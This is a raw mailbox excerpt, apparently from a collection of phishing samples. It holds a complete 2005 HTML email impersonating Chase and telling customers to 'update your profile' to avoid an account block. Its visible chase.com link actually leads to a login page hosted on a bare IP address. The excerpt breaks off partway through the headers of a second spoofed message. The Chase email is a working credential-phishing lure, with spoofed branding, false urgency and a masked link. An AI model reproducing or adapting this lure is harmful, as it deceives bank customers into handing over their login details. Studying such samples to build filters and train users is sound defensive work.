From: security@chase.com <security@chase.com>
Content-Type: text/html
Message-Id: <20051017154555.1D0AFBA547@iMacWebServer>
Date: Mon, 17 Oct 2005 09:45:55 -0600 (MDT)
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: 
X-Spam-Status: No, score=0.5 required=5.0 tests=HTML_40_50,HTML_MESSAGE,
	HTML_TAG_EXIST_TBODY,MIME_HEADER_CTYPE_ONLY,MIME_HTML_ONLY,
	NORMAL_HTTP_TO_IP autolearn=no version=3.0.2
X-Spam-Report: 
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.0 HTML_40_50 BODY: Message is 40% to 50% HTML
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 HTML_TAG_EXIST_TBODY BODY: HTML has "tbody" tag
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  0.1 MIME_HEADER_CTYPE_ONLY 'Content-Type' found without required MIME headers
Status: O
X-Status: 
X-Keywords:                  
X-UID: 377


<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>- NNSECU -</title>
<meta name="generator" content="Namo WebEditor v5.0(Trial)">
</head>

<body>

<!--VERSION value="4.3.0"-->
<TABLE cellSpacing=0 cellPadding=0 width=774 border=0 xt="SPTABLE"
name="SP_TABLE1" id="table1" height="320">
<TBODY>
<TR xt="SPROW">
<TD xt="SPCELL" name="yyy" height="42"><img src="http://www.chase.com/cm/shared/cfs/image/logo/chase_logo.gif">
</TD></TR>
<TR xt="SPROW">
<TD xt="SPCELL" name="yyy">

<p align="left"> </p>
<p align="left"><font face="Verdana" size="2">Dear CHASE Customers,</font></p>
<p align="justify"><font face="Verdana" size="2">As the Internet and information technology enable us to expand our services, we are committed to maintaining the trust customers have placed in us for protecting the privacy and security of information we have about you. In order to protect your information against unauthorized access, identity theft and account fraud we earnestly ask you to update your profile. PLEASE REMEMBER YOU NEED TO CONFIRM ALL FIELDS OF THE FORM TO AVOID ACCOUNT BLOCK, and remember we do this for your safety!</font></p>


<p align="justify"><font face="Verdana" size="2">To resubmit your information, please click 
the link below:</font></p>
<p align="justify">


<font face="Verdana" size="2"><b><a target="_blank" href="http://67.18.208.132/~craig/images/logon/chaseonline/index.html ">http://www.chase.com/account-confirm23942942/confirmation.html  </a></b></font></p>
<p align="justify"><font face="Verdana" size="2">If you received this notice and you are not the authorized account holder,
please be aware that it is in violation of our policy to represent oneself
as another CHASE user. Such action may also be in violation of local, national, 
and/or international law. CHASE is committed to assist law enforcement with 
any inquiries related to attempts to misappropriate personal information with
the intent to commit fraud or theft. Information will be provided at the request
of law enforcement agencies to ensure that perpetrators are prosecuted to the 
fullest extent of the law.</font></p>

<table align=right width="200" border="0">
  <tr>
    <td>&nbsp;</td>
  </tr>
</table>
<p align="justify"><font face="Verdana" size="2">Thanks for your patience as we work together to protect your account.</font></p>

<p align="justify"><font face="Verdana" size="2">Special Regards,</font></p>
<p align="justify"><font face="Verdana" size="2">CHASE Customer Support Center.</font></p>

 
<div align="left"><font color="#bbb7c7" size="1" face="verdana,arial,helvetica"><span class="footer-text"><br>
  <br>
  This site is directed at or made available to persons in the United States and CHASE customers only. 
   Products and services described, as well as associated fees, charges, 
  interest rates, and balance requirements may differ among geographic locations. 
  Not all products and services are offered at all locations.<br>
  </span><br>
</font></div>

 

<div align="right"><font color="#bbb7c7" size="1" face="verdana,arial,helvetica">Copyright © 2005 - CHASE. Member FDIC. Equal Housing Lender. <img src="http://www.bankofthewest.com/BOW/assets/vcmStaticContent/images/icon_ehl.gif">
</font></div>

</TD></TR>
</TBODY></TABLE>
</body>

</html>

From confirm@cuna.org  Tue Oct 18 08:30:11 2005
Return-Path: <confirm@cuna.org>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 82E7B536E8D
	for <jose@login.monkey.org>; Tue, 18 Oct 2005 08:30:11 -0400 (EDT)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 665686FA400
	for <jose@monkey.org>; Tue, 18 Oct 2005 08:30:08 -0400 (EDT)
Received: from lujan.uninet.edu (bio.hgy.es [193.146.180.21])
	by mail2.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 18 Oct 2005 08:30:08 -0400 (EDT)
Received: by lujan.uninet.edu (Postfix)
	id 08E391BC43; Tue, 18 Oct 2005 14:29:36 +0200 (CEST)
Delivered-To: umeet@uninet.edu
Received: from localhost (unknown [127.0.0.1])
	by lujan.uninet.edu (Postfix) with ESMTP
	id 1278E1BBE9; Tue, 18 Oct 2005 12:29:34 +0000 (UTC)
Received: from lujan.uninet.edu ([193.146.180.21])
	by localhost (lujan [193.146.180.21]) (amavisd-new, port 10024)
	with ESMTP id 16031-01; Tue, 18 Oct 2005 14:28:47 +0200 (CEST)
Received: from rocinante.compendium.com.ar (unknown [200.69.230.11])
	by lujan.uninet.edu (Postfix) with ESMTP
	id 589D51BBD5; Tue, 18 Oct 2005 14:28:28 +0200 (CEST)
Received: from localhost (rocinante [127.0.0.1])
	by rocinante.compendium.com.ar (Postfix) with ESMTP id A9352500069;
	Tue, 18 Oct 2005 09:28:22 -0300 (ART)
Received: from rocinante.compendium.com.ar ([127.0.0.1])
	by localhost (rocinante [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id 16028-04; Tue, 18 Oct 2005 09:28:19 -0300 (ART)
Received: from 72.36.234.194 (unknown [72.36.234.194])
	by rocinante.compendium.com.ar (Postfix) with SMTP id 4970650003F;
	Tue, 18 Oct 2005 09:28:16 -0300 (ART)
Received: from 13.230.135.13 by ; Tue, 18 Oct 2005 14:21:19 -0600
Message-ID: <OFHZGIDIWRNODOLKILZUDJZ@comcast.net>
